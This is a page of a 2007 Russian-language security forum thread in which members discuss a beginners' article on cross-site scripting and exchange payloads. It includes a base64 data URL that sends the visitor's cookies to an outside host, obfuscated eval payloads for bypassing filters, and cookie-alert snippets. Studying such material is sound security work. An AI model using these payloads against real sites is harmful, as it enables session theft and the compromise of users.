ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО_OLD > Статьи > Авторские статьи
Перезагрузить страницу Cross Site Scripting для новичков
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.07.2007, 19:43
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796

Репутация: 1095


По умолчанию
мдя, в ФФ1.5 и в minefild - срабатует нормально => ее можно считать браузерозависимой xss
в операх от 8 до 9-й версии такого эффекта не наблюдается.. (хотя и можно некоторым образом ее использовать)
а ie вообще data не поддерживает..

беру свои слова насчет, того, что ты не разобрался в этой xss назад,
но все же, статья получилась поверхностной и недоработанной: когда работаешь с xss - проверять ее работоспособность на наиболее популярных браузерах имхо ПРОСТО ОБЯЗАТЕЛЬНО.. если б ты проделал подобную работу сейчас бы не было тут наших споров и статья бы имела большую полезность..
 

  #12  
Старый 10.07.2007, 21:03
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию
имхо зря вы на него накинулись, афтор не задавался целью описать все апекты xss в подробностях.... ТО что надо для первого ознакомления и понимая сути присутствует....


Цитата:
А теперь попробуйте зайти на любой форум, войти под своим именем пользователя и ввести в браузере, не уходя с форума, адрес:data:text/html;base64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcH Q+
(с) http://www.cyberinfo.ru/index.php?newsid=1078

Куки алертицца)
Последний раз редактировалось Zitt; 10.07.2007 в 21:16..
 

  #13  
Старый 10.07.2007, 22:39
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию
На античате тысяча и одна статья как пихать <script>alert()</script , но никто не копает глубже.Вам не надоело писать одно и тоже ТЫСЯЧУ раз?

Код:
onclick='123["e"[0]+"v"[0]+"a"[0]+"l"[0]](alert(/1/))
onclick='open*eval*(alert(/1/))
onclick=top['ev'["con"+"cat"]('al')](alert(/1/))
Последний раз редактировалось gemaglabin; 10.07.2007 в 22:42..
 

  #14  
Старый 10.07.2007, 23:23
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
Цитата:
Сообщение от [53x]Shadow  
А как на счет https://forum.antichat.ru/thread42951.html ?
А там написано что-то новое?)))
__________________
 

  #15  
Старый 14.07.2007, 16:25
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
Цитата:
Сообщение от _Pantera_  
2 Вписуеться в окно браузера
PHP код:
data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vc2l0ZS5ydS9pbWFnZS5naWY/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ
Firefox/2.0.0.4 думаю на других работать тоже должно
можно и просто так... на любых браузерах...
Цитата:
javascript:alert(document.cookie);
 

  #16  
Старый 14.07.2007, 18:51
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию
Data -протокол (IE его не поддерживает), это относится к уязвимости ПО (Опера и к браузерам построенных на движке Gecko).
Последний раз редактировалось ettee; 17.01.2010 в 01:42..
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ